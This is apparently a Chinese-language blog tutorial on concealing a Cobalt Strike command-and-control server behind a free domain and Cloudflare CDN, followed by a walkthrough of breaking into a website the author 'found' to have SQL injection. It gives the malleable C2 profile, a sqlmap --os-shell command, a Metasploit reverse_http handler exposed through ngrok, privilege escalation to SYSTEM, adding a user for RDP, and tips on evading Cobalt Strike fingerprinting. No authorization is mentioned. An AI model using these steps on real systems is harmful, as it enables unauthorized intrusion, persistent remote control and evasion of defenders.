基础配置
保姆级Cobalt Strike主机隐藏教程
在vultr上安装openjdk-11-jre和screen并将teamserver上传
- 修改默认端口,并控制可访问ip
我这里用zerotier组了一个局域网,将teaserver的端口仅对局域网开放
2022年7月更新
用nkn隧道替代zerotier,降低系统资源占用
- 添加cdn
去freenom或者是nic.eu.org整个免费域名
然后用cloudflare接管域名并添加dns解析,开启cdn
- 生成并替换证书
1
2
|
openssl pkcs12 -export -in example.com.pem -inkey example.com.key -out cdn.example.com.p12 -name cdn.example.com -passout pass:password
keytool -importkeystore -deststorepass password -destkeypass password -destkeystore cdn.example.com.store -srckeystore cdn.example.com.p12 -srcstoretype PKCS12 -srcstorepass password -alias cdn.example.com
|
cloudflare.profile该profile来自参考文章,实际使用时需要进行完善
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
https-certificate {
set keystore "cdn.example.com.store";
set password "password";
}
http-stager {
set uri_x86 "/api/1";
set uri_x64 "/api/2";
client {
header "Host" "cdn.example.com";
}
server {
output{
print;
}
}
}
http-get {
set uri "/api/3";
client {
header "Host" "cdn.example.com";
metadata {
base64;
header "Cookie";
}
}
server {
output{
print;
}
}
}
http-post {
set uri "/api/4";
client {
header "Host" "cdn.example.com";
id {
uri-append;
}
output{
print;
}
}
server {
output{
print;
}
}
}
|
用screen把teamserver挂在后台
- 连接teamserver
- 添加监听器
CS上线
发现一个网站存在sql注入
1
2
3
4
5
6
7
8
9
10
11
12
13
|
POST /xxxxx/login.aspx HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Length: 183
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=xxx
Origin: https://ip
Range: bytes=0-10240
Referer: https://ip/xxxxx/default.aspx
Upgrade-Insecure-Requests: 1
login_button=Login&txtPass=password&txtUser=username
|
sqlmap得到os-shell
sqlmap -r request.txt -p "txtUser" --random-agent --risk 3 --level 3 --technique ES --random-agent --os-shell
生成payload
将payload复制到os-shell中并执行,等待CS上线
当前用户为nt authority\network service需要进行提权操作
联动MSF
MSF设置
- 配置ngrok,将MSF监听端口映射到公网
ngrok tcp 5000即可
- MSF监听设置
注意这里要选择reverse_http而不是reverse_tcp
1
2
3
4
5
|
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set lhost 127.0.0.1
msf6 exploit(multi/handler) > set lport 5000
msf6 exploit(multi/handler) > run
|
CS设置
- 设置新的监听器
- 新建会话
选择msf的监听器
等待msf接收即可
MSF提权
非常幸运,用getsystem自动提权就将权限提升到nt authority\system
之前用CS读取systeminfo并分析的时候,发现可以用CVE-2020-0787进行提权
https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION这个exp需要进行一定的修改
添加用户
shodan已经提示该ip已经开启了3389端口,同时也使用nmap进行确认
利用Parallels Client进行连接
这个软件有个好处,可以通过代理连接rdp
2022年7月更新
Cobalt Strike原版的特征没有去除,解决方法
- 去除特征
stager URL生成机制
CS4.4绕过vultr特征检测修改checksum8算法
- 利用ufw限制可访问端口的ip(治标不治本)
因为cs是通过cdn上线的,因此只允许cdn的ip访问443端口是一种临时解决方案,归根结底还是需要对checksum8算法进行修改
1
2
3
4
5
6
7
|
#!/bin/bash
ipv4s=`curl -s https://www.cloudflare.com/ips-v4`
ipv6s=`curl -s https://www.cloudflare.com/ips-v6`
for ip in $ipv4s$IFS$ipv6s
do
ufw allow from $ip to any port 443;
done
|
